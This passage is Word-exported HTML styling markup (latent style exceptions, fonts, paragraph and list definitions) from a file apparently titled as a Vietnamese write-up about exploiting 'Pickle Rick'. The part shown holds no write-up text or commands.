<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="19" QFormat="true"
|
||
Name="Subtle Emphasis"/>
|
||
<w:LsdException Locked="false" Priority="21" QFormat="true"
|
||
Name="Intense Emphasis"/>
|
||
<w:LsdException Locked="false" Priority="31" QFormat="true"
|
||
Name="Subtle Reference"/>
|
||
<w:LsdException Locked="false" Priority="32" QFormat="true"
|
||
Name="Intense Reference"/>
|
||
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
|
||
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
|
||
UnhideWhenUsed="true" Name="Bibliography"/>
|
||
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
|
||
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
|
||
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
|
||
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
|
||
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
|
||
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
|
||
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
|
||
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
|
||
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
|
||
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
|
||
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
|
||
<w:LsdException Locked="false" Priority="46"
|
||
Name="Grid Table 1 Light Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="51"
|
||
Name="Grid Table 6 Colorful Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="52"
|
||
Name="Grid Table 7 Colorful Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="46"
|
||
Name="Grid Table 1 Light Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="51"
|
||
Name="Grid Table 6 Colorful Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="52"
|
||
Name="Grid Table 7 Colorful Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="46"
|
||
Name="Grid Table 1 Light Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="51"
|
||
Name="Grid Table 6 Colorful Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="52"
|
||
Name="Grid Table 7 Colorful Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="46"
|
||
Name="Grid Table 1 Light Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="51"
|
||
Name="Grid Table 6 Colorful Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="52"
|
||
Name="Grid Table 7 Colorful Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="46"
|
||
Name="Grid Table 1 Light Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="51"
|
||
Name="Grid Table 6 Colorful Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="52"
|
||
Name="Grid Table 7 Colorful Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="46"
|
||
Name="Grid Table 1 Light Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="51"
|
||
Name="Grid Table 6 Colorful Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="52"
|
||
Name="Grid Table 7 Colorful Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
|
||
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
|
||
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
|
||
<w:LsdException Locked="false" Priority="46"
|
||
Name="List Table 1 Light Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="51"
|
||
Name="List Table 6 Colorful Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="52"
|
||
Name="List Table 7 Colorful Accent 1"/>
|
||
<w:LsdException Locked="false" Priority="46"
|
||
Name="List Table 1 Light Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="51"
|
||
Name="List Table 6 Colorful Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="52"
|
||
Name="List Table 7 Colorful Accent 2"/>
|
||
<w:LsdException Locked="false" Priority="46"
|
||
Name="List Table 1 Light Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="51"
|
||
Name="List Table 6 Colorful Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="52"
|
||
Name="List Table 7 Colorful Accent 3"/>
|
||
<w:LsdException Locked="false" Priority="46"
|
||
Name="List Table 1 Light Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="51"
|
||
Name="List Table 6 Colorful Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="52"
|
||
Name="List Table 7 Colorful Accent 4"/>
|
||
<w:LsdException Locked="false" Priority="46"
|
||
Name="List Table 1 Light Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="51"
|
||
Name="List Table 6 Colorful Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="52"
|
||
Name="List Table 7 Colorful Accent 5"/>
|
||
<w:LsdException Locked="false" Priority="46"
|
||
Name="List Table 1 Light Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="51"
|
||
Name="List Table 6 Colorful Accent 6"/>
|
||
<w:LsdException Locked="false" Priority="52"
|
||
Name="List Table 7 Colorful Accent 6"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Mention"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Smart Hyperlink"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Hashtag"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Unresolved Mention"/>
|
||
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
|
||
Name="Smart Link"/>
|
||
</w:LatentStyles>
|
||
</xml><![endif]-->
|
||
<style>
|
||
<!--
|
||
/* Font Definitions */
|
||
@font-face
|
||
{font-family:Wingdings;
|
||
panose-1:5 0 0 0 0 0 0 0 0 0;
|
||
mso-font-charset:2;
|
||
mso-generic-font-family:auto;
|
||
mso-font-pitch:variable;
|
||
mso-font-signature:0 268435456 0 0 -2147483648 0;}
|
||
@font-face
|
||
{font-family:"Cambria Math";
|
||
panose-1:2 4 5 3 5 4 6 3 2 4;
|
||
mso-font-charset:0;
|
||
mso-generic-font-family:roman;
|
||
mso-font-pitch:variable;
|
||
mso-font-signature:3 0 0 0 1 0;}
|
||
@font-face
|
||
{font-family:Calibri;
|
||
panose-1:2 15 5 2 2 2 4 3 2 4;
|
||
mso-font-charset:0;
|
||
mso-generic-font-family:swiss;
|
||
mso-font-pitch:variable;
|
||
mso-font-signature:-469750017 -1073732485 9 0 511 0;}
|
||
@font-face
|
||
{font-family:"Calibri Light";
|
||
panose-1:2 15 3 2 2 2 4 3 2 4;
|
||
mso-font-charset:0;
|
||
mso-generic-font-family:swiss;
|
||
mso-font-pitch:variable;
|
||
mso-font-signature:-469750017 -1073732485 9 0 511 0;}
|
||
/* Style Definitions */
|
||
p.MsoNormal, li.MsoNormal, div.MsoNormal
|
||
{mso-style-unhide:no;
|
||
mso-style-qformat:yes;
|
||
mso-style-parent:"";
|
||
margin-top:0in;
|
||
margin-right:0in;
|
||
margin-bottom:8.0pt;
|
||
margin-left:0in;
|
||
line-height:107%;
|
||
mso-pagination:widow-orphan;
|
||
font-size:11.0pt;
|
||
font-family:"Calibri",sans-serif;
|
||
mso-ascii-font-family:Calibri;
|
||
mso-ascii-theme-font:minor-latin;
|
||
mso-fareast-font-family:Calibri;
|
||
mso-fareast-theme-font:minor-latin;
|
||
mso-hansi-font-family:Calibri;
|
||
mso-hansi-theme-font:minor-latin;
|
||
mso-bidi-font-family:"Times New Roman";
|
||
mso-bidi-theme-font:minor-bidi;}
|
||
p.MsoHeader, li.MsoHeader, div.MsoHeader
|
||
{mso-style-priority:99;
|
||
mso-style-link:"Header Char";
|
||
margin:0in;
|
||
mso-pagination:widow-orphan;
|
||
tab-stops:center 3.25in right 6.5in;
|
||
font-size:11.0pt;
|
||
font-family:"Calibri",sans-serif;
|
||
mso-ascii-font-family:Calibri;
|
||
mso-ascii-theme-font:minor-latin;
|
||
mso-fareast-font-family:Calibri;
|
||
mso-fareast-theme-font:minor-latin;
|
||
mso-hansi-font-family:Calibri;
|
||
mso-hansi-theme-font:minor-latin;
|
||
mso-bidi-font-family:"Times New Roman";
|
||
mso-bidi-theme-font:minor-bidi;}
|
||
p.MsoFooter, li.MsoFooter, div.MsoFooter
|
||
{mso-style-priority:99;
|
||
mso-style-link:"Footer Char";
|
||
margin:0in;
|
||
mso-pagination:widow-orphan;
|
||
tab-stops:center 3.25in right 6.5in;
|
||
font-size:11.0pt;
|
||
font-family:"Calibri",sans-serif;
|
||
mso-ascii-font-family:Calibri;
|
||
mso-ascii-theme-font:minor-latin;
|
||
mso-fareast-font-family:Calibri;
|
||
mso-fareast-theme-font:minor-latin;
|
||
mso-hansi-font-family:Calibri;
|
||
mso-hansi-theme-font:minor-latin;
|
||
mso-bidi-font-family:"Times New Roman";
|
||
mso-bidi-theme-font:minor-bidi;}
|
||
a:link, span.MsoHyperlink
|
||
{mso-style-priority:99;
|
||
color:#0563C1;
|
||
mso-themecolor:hyperlink;
|
||
text-decoration:underline;
|
||
text-underline:single;}
|
||
a:visited, span.MsoHyperlinkFollowed
|
||
{mso-style-noshow:yes;
|
||
mso-style-priority:99;
|
||
color:#954F72;
|
||
mso-themecolor:followedhyperlink;
|
||
text-decoration:underline;
|
||
text-underline:single;}
|
||
p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph
|
||
{mso-style-priority:34;
|
||
mso-style-unhide:no;
|
||
mso-style-qformat:yes;
|
||
margin-top:0in;
|
||
margin-right:0in;
|
||
margin-bottom:8.0pt;
|
||
margin-left:.5in;
|
||
mso-add-space:auto;
|
||
line-height:107%;
|
||
mso-pagination:widow-orphan;
|
||
font-size:11.0pt;
|
||
font-family:"Calibri",sans-serif;
|
||
mso-ascii-font-family:Calibri;
|
||
mso-ascii-theme-font:minor-latin;
|
||
mso-fareast-font-family:Calibri;
|
||
mso-fareast-theme-font:minor-latin;
|
||
mso-hansi-font-family:Calibri;
|
||
mso-hansi-theme-font:minor-latin;
|
||
mso-bidi-font-family:"Times New Roman";
|
||
mso-bidi-theme-font:minor-bidi;}
|
||
p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst
|
||
{mso-style-priority:34;
|
||
mso-style-unhide:no;
|
||
mso-style-qformat:yes;
|
||
mso-style-type:export-only;
|
||
margin-top:0in;
|
||
margin-right:0in;
|
||
margin-bottom:0in;
|
||
margin-left:.5in;
|
||
mso-add-space:auto;
|
||
line-height:107%;
|
||
mso-pagination:widow-orphan;
|
||
font-size:11.0pt;
|
||
font-family:"Calibri",sans-serif;
|
||
mso-ascii-font-family:Calibri;
|
||
mso-ascii-theme-font:minor-latin;
|
||
mso-fareast-font-family:Calibri;
|
||
mso-fareast-theme-font:minor-latin;
|
||
mso-hansi-font-family:Calibri;
|
||
mso-hansi-theme-font:minor-latin;
|
||
mso-bidi-font-family:"Times New Roman";
|
||
mso-bidi-theme-font:minor-bidi;}
|
||
p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle
|
||
{mso-style-priority:34;
|
||
mso-style-unhide:no;
|
||
mso-style-qformat:yes;
|
||
mso-style-type:export-only;
|
||
margin-top:0in;
|
||
margin-right:0in;
|
||
margin-bottom:0in;
|
||
margin-left:.5in;
|
||
mso-add-space:auto;
|
||
line-height:107%;
|
||
mso-pagination:widow-orphan;
|
||
font-size:11.0pt;
|
||
font-family:"Calibri",sans-serif;
|
||
mso-ascii-font-family:Calibri;
|
||
mso-ascii-theme-font:minor-latin;
|
||
mso-fareast-font-family:Calibri;
|
||
mso-fareast-theme-font:minor-latin;
|
||
mso-hansi-font-family:Calibri;
|
||
mso-hansi-theme-font:minor-latin;
|
||
mso-bidi-font-family:"Times New Roman";
|
||
mso-bidi-theme-font:minor-bidi;}
|
||
p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast
|
||
{mso-style-priority:34;
|
||
mso-style-unhide:no;
|
||
mso-style-qformat:yes;
|
||
mso-style-type:export-only;
|
||
margin-top:0in;
|
||
margin-right:0in;
|
||
margin-bottom:8.0pt;
|
||
margin-left:.5in;
|
||
mso-add-space:auto;
|
||
line-height:107%;
|
||
mso-pagination:widow-orphan;
|
||
font-size:11.0pt;
|
||
font-family:"Calibri",sans-serif;
|
||
mso-ascii-font-family:Calibri;
|
||
mso-ascii-theme-font:minor-latin;
|
||
mso-fareast-font-family:Calibri;
|
||
mso-fareast-theme-font:minor-latin;
|
||
mso-hansi-font-family:Calibri;
|
||
mso-hansi-theme-font:minor-latin;
|
||
mso-bidi-font-family:"Times New Roman";
|
||
mso-bidi-theme-font:minor-bidi;}
|
||
span.HeaderChar
|
||
{mso-style-name:"Header Char";
|
||
mso-style-priority:99;
|
||
mso-style-unhide:no;
|
||
mso-style-locked:yes;
|
||
mso-style-link:Header;}
|
||
span.FooterChar
|
||
{mso-style-name:"Footer Char";
|
||
mso-style-priority:99;
|
||
mso-style-unhide:no;
|
||
mso-style-locked:yes;
|
||
mso-style-link:Footer;}
|
||
.MsoChpDefault
|
||
{mso-style-type:export-only;
|
||
mso-default-props:yes;
|
||
font-family:"Calibri",sans-serif;
|
||
mso-ascii-font-family:Calibri;
|
||
mso-ascii-theme-font:minor-latin;
|
||
mso-fareast-font-family:Calibri;
|
||
mso-fareast-theme-font:minor-latin;
|
||
mso-hansi-font-family:Calibri;
|
||
mso-hansi-theme-font:minor-latin;
|
||
mso-bidi-font-family:"Times New Roman";
|
||
mso-bidi-theme-font:minor-bidi;}
|
||
.MsoPapDefault
|
||
{mso-style-type:export-only;
|
||
margin-bottom:8.0pt;
|
||
line-height:107%;}
|
||
/* Page Definitions */
|
||
@page
|
||
{mso-footnote-separator:url("Khai%20thác%20Pickle%20Rick%20_files/header.htm") fs;
|
||
mso-footnote-continuation-separator:url("Khai%20thác%20Pickle%20Rick%20_files/header.htm") fcs;
|
||
mso-endnote-separator:url("Khai%20thác%20Pickle%20Rick%20_files/header.htm") es;
|
||
mso-endnote-continuation-separator:url("Khai%20thác%20Pickle%20Rick%20_files/header.htm") ecs;}
|
||
@page WordSection1
|
||
{size:8.5in 11.0in;
|
||
margin:1.0in 1.0in 1.0in 1.0in;
|
||
mso-header-margin:.5in;
|
||
mso-footer-margin:.5in;
|
||
mso-footer:url("Khai%20thác%20Pickle%20Rick%20_files/header.htm") f1;
|
||
mso-paper-source:0;}
|
||
div.WordSection1
|
||
{page:WordSection1;}
|
||
/* List Definitions */
|
||
@list l0
|
||
{mso-list-id:413629757;
|
||
mso-list-type:hybrid;
|
||
mso-list-template-ids:-1566689646 407122604 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
|
||
@list l0:level1
|
||
{mso-level-start-at:0;
|
||
mso-level-number-format:bullet;
|
||
mso-level-text:\F0F0;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;
|
||
mso-fareast-font-family:Calibri;
|
||
mso-fareast-theme-font:minor-latin;
|
||
mso-bidi-font-family:"Calibri Light";
|
||
mso-bidi-theme-font:major-latin;}
|
||
@list l0:level2
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l0:level3
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l0:level4
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l0:level5
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l0:level6
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l0:level7
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l0:level8
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l0:level9
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l1
|
||
{mso-list-id:415251017;
|
||
mso-list-type:hybrid;
|
||
mso-list-template-ids:-1658662980 21688932 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
|
||
@list l1:level1
|
||
{mso-level-start-at:0;
|
||
mso-level-number-format:bullet;
|
||
mso-level-text:-;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
margin-left:2.25in;
|
||
text-indent:-.25in;
|
||
font-family:"Calibri Light",sans-serif;
|
||
mso-fareast-font-family:Calibri;
|
||
mso-fareast-theme-font:minor-latin;}
|
||
@list l1:level2
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
margin-left:2.75in;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l1:level3
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
margin-left:3.25in;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l1:level4
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
margin-left:3.75in;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l1:level5
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
margin-left:4.25in;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l1:level6
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
margin-left:4.75in;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l1:level7
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
margin-left:5.25in;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l1:level8
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
margin-left:5.75in;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l1:level9
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
margin-left:6.25in;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l2
|
||
{mso-list-id:952202420;
|
||
mso-list-type:hybrid;
|
||
mso-list-template-ids:-487539466 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
|
||
@list l2:level1
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l2:level2
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l2:level3
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l2:level4
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l2:level5
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l2:level6
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l2:level7
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l2:level8
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l2:level9
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l3
|
||
{mso-list-id:979185759;
|
||
mso-list-type:hybrid;
|
||
mso-list-template-ids:-317560336 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
|
||
@list l3:level1
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l3:level2
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l3:level3
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l3:level4
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l3:level5
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l3:level6
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l3:level7
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l3:level8
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l3:level9
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l4
|
||
{mso-list-id:1210923306;
|
||
mso-list-type:hybrid;
|
||
mso-list-template-ids:1619276620 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
|
||
@list l4:level1
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
